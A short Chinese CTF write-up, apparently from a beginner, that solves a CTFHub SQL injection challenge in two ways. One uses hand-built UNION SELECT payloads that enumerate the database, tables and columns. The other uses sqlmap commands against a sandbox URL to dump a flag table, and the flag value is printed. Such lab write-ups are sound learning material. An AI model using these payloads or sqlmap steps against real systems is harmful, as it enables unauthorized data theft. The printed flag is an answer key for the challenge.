小白一个,如有错误还请各位大佬指正!
解法一:手搓
1.输入1和2都有回显,3没有回显,得知数据库只有两个字段。开始构造payload,暴个数据库看看
123' union select 1,database()#
2.发现目标 爆个表名看看
123' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli' #'
3.发现名为flag的表 冲啦兄弟们
123' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'#
4.发现falg表的字段只有flag 很明显flag就在在这里啦
123' union select 1,flag from sqli.flag #
5.拿到 ctfhub{d53cb574dc4425ec5f74aae1}
解法二:sqlmap
1.打开sqlmap 扫一波
sqlmap -u http://challenge-7b5f5e4499b0bc97.sandbox.ctfhub.com:10800/?id=1
2.有说法 爆数据库
sqlmap -u http://challenge-7b5f5e4499b0bc97.sandbox.ctfhub.com:10800/?id=1 --dbs
3.发现目标 爆表名
sqlmap -u http://challenge-7b5f5e4499b0bc97.sandbox.ctfhub.com:10800/?id=1 --D sqli --tables
4.看到flag表了 爆字段
sqlmap -u http://challenge-7b5f5e4499b0bc97.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns
5.最后一步 爆字段内容
sqlmap -u http://challenge-7b5f5e4499b0bc97.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump
成功拿到flag!